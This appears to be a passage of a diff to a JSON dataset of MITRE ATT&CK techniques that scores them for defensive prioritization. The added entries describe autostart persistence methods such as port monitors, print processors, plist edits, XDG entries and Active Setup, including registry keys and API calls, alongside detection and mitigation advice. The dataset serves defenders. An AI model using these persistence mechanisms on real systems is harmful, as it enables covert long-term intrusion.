-            "SI-4",
-            "SI-7"
+            "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.5095238095238095,
-            "mitigation_score": 0.9636363636363636,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.00164997
+        "hardware_coverage": false
     },
     {
-        "tid": "T1074",
-        "name": "Data Staged",
-        "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.",
-        "url": "https://attack.mitre.org/techniques/T1074",
+        "tid": "T1547.010",
+        "name": "Boot or Logon Autostart Execution: Port Monitors",
+        "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
+        "url": "https://attack.mitre.org/techniques/T1547/010",
         "tactics": [
-            "Collection"
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Access",
-            "File: File Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1074.001",
-                "name": "Data Staged: Local Data Staging",
-                "url": "https://attack.mitre.org/techniques/T1074/001",
-                "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
-                "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": []
-            },
-            {
-                "tid": "T1074.002",
-                "name": "Data Staged: Remote Data Staging",
-                "url": "https://attack.mitre.org/techniques/T1074/002",
-                "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.",
-                "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
-                "mitigations": []
-            }
+            "File: File Creation",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "mitigations": [],
-        "cumulative_score": 1.1816798561904762,
-        "adjusted_score": 1.1816798561904762,
-        "has_car": false,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.13333333333333333,
+        "adjusted_score": 0.13333333333333333,
+        "has_car": true,
         "has_sigma": true,
         "has_es_siem": true,
         "has_splunk": true,
@@ -4587,148 +27445,30 @@
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.47619047619047616,
-            "detection_score": 1
-        },
-        "choke_point_score": 0.6000000000000001,
-        "prevalence_score": 0.10548938
+        "hardware_coverage": false
     },
     {
-        "tid": "T1078",
-        "name": "Valid Accounts",
-        "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)",
-        "url": "https://attack.mitre.org/techniques/T1078",
+        "tid": "T1547.011",
+        "name": "Boot or Logon Autostart Execution: Plist Modification",
+        "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)",
+        "url": "https://attack.mitre.org/techniques/T1547/011",
         "tactics": [
-            "Defense Evasion",
-            "Initial Access",
             "Persistence",
             "Privilege Escalation"
         ],
-        "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+        "detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ",
         "platforms": [
-            "Azure AD",
-            "Containers",
-            "Google Workspace",
-            "IaaS",
-            "Linux",
-            "Office 365",
-            "SaaS",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Logon Session: Logon Session Creation",
-            "Logon Session: Logon Session Metadata",
-            "User Account: User Account Authentication"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1078.001",
-                "name": "Valid Accounts: Default Accounts",
-                "url": "https://attack.mitre.org/techniques/T1078/001",
-                "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)",
-                "detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
-                "mitigations": [
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
-            },
-            {
-                "tid": "T1078.002",
-                "name": "Valid Accounts: Domain Accounts",
-                "url": "https://attack.mitre.org/techniques/T1078/002",
-                "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
-                "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
-            {
-                "tid": "T1078.003",
-                "name": "Valid Accounts: Local Accounts",
-                "url": "https://attack.mitre.org/techniques/T1078/003",
-                "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
-                "detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
-                "mitigations": [
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1078.004",
-                "name": "Valid Accounts: Cloud Accounts",
-                "url": "https://attack.mitre.org/techniques/T1078/004",
-                "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.",
-                "detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            }
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Service: Service Creation"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1013",
@@ -4737,16 +27477,10 @@
                 "url": "https://attack.mitre.org/mitigations/M1013"
             },
             {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             },
             {
                 "mid": "M1017",
@@ -4755,219 +27489,238 @@
                 "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 1.3577231300000001,
-        "adjusted_score": 1.3577231300000001,
+        "cumulative_score": 0.35238095238095235,
+        "adjusted_score": 0.35238095238095235,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
-            "4.7",
-            "5.1",
-            "5.2",
-            "5.3",
+            "3.3",
+            "4.1",
             "5.4",
-            "5.5",
             "6.1",
             "6.2",
             "6.8",
-            "16.1",
-            "16.9"
+            "14.3",
+            "14.4"
         ],
         "nist_controls": [
-            "AC-2",
+            "AC-16",
+            "AC-17",
             "AC-3",
-            "AC-5",
             "AC-6",
             "CA-7",
-            "CA-8",
+            "CM-2",
+            "CM-3",
             "CM-5",
             "CM-6",
-            "IA-12",
-            "IA-2",
-            "IA-5",
-            "RA-5",
+            "CM-7",
             "SA-10",
             "SA-11",
-            "SA-15",
-            "SA-16",
-            "SA-17",
-            "SA-3",
-            "SA-4",
             "SA-8",
-            "SC-28",
             "SI-4",
-            "SR-6"
+            "SI-7"
         ],
         "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.8,
-            "mitigation_score": 0.6181818181818182,
-            "detection_score": 1
-        },
-        "choke_point_score": 0.55,
-        "prevalence_score": 0.00772313
+        "hardware_coverage": false
     },
     {
-        "tid": "T1080",
-        "name": "Taint Shared Content",
-        "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
-        "url": "https://attack.mitre.org/techniques/T1080",
+        "tid": "T1547.012",
+        "name": "Boot or Logon Autostart Execution: Print Processors",
+        "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.",
+        "url": "https://attack.mitre.org/techniques/T1547/012",
         "tactics": [
-            "Lateral Movement"
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Driver: Driver Load",
+            "File: File Creation",
+            "Module: Module Load",
+            "Process: OS API Execution",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.2142857142857143,
+        "adjusted_score": 0.2142857142857143,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CM-5",
+            "IA-2",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1547.013",
+        "name": "Boot or Logon Autostart Execution: XDG Autostart Entries",
+        "description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.",
+        "url": "https://attack.mitre.org/techniques/T1547/013",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
         ],
-        "detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
+        "detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.",
         "platforms": [
-            "Linux",
-            "Office 365",
-            "SaaS",
-            "Windows",
-            "macOS"
+            "Linux"
         ],
         "data_sources": [
+            "Command: Command Execution",
             "File: File Creation",
             "File: File Modification",
-            "Network Share: Network Share Access",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1547",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
+                "mid": "M1033",
+                "name": "Limit Software Installation",
+                "description": "Block users or groups from installing unapproved software.",
+                "url": "https://attack.mitre.org/mitigations/M1033"
             },
             {
                 "mid": "M1022",
                 "name": "Restrict File and Directory Permissions",
                 "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
                 "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.47171102142857146,
-        "adjusted_score": 0.47171102142857146,
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": false,
-        "cis_controls": [
-            "2.5",
-            "3.3",
-            "4.1",
-            "6.1",
-            "6.2",
-            "6.8",
-            "10.5"
-        ],
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
         "nist_controls": [
+            "AC-17",
+            "AC-2",
             "AC-3",
+            "AC-5",
+            "AC-6",
             "CA-7",
+            "CM-11",
             "CM-2",
-            "CM-7",
-            "SC-4",
-            "SC-7",
-            "SI-10",
+            "CM-3",
+            "CM-5",
+            "CM-6",
+            "IA-2",
             "SI-3",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.17142857142857143,
-            "mitigation_score": 0.3090909090909091,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.30000000000000004,
-        "prevalence_score": 0.00028245
+        "hardware_coverage": false
     },
     {
-        "tid": "T1082",
-        "name": "System Information Discovery",
-        "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
-        "url": "https://attack.mitre.org/techniques/T1082",
+        "tid": "T1547.014",
+        "name": "Boot or Logon Autostart Execution: Active Setup",
+        "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under  HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+        "url": "https://attack.mitre.org/techniques/T1547/014",
         "tactics": [
-            "Discovery"
+            "Persistence",
+            "Privilege Escalation"
         ],
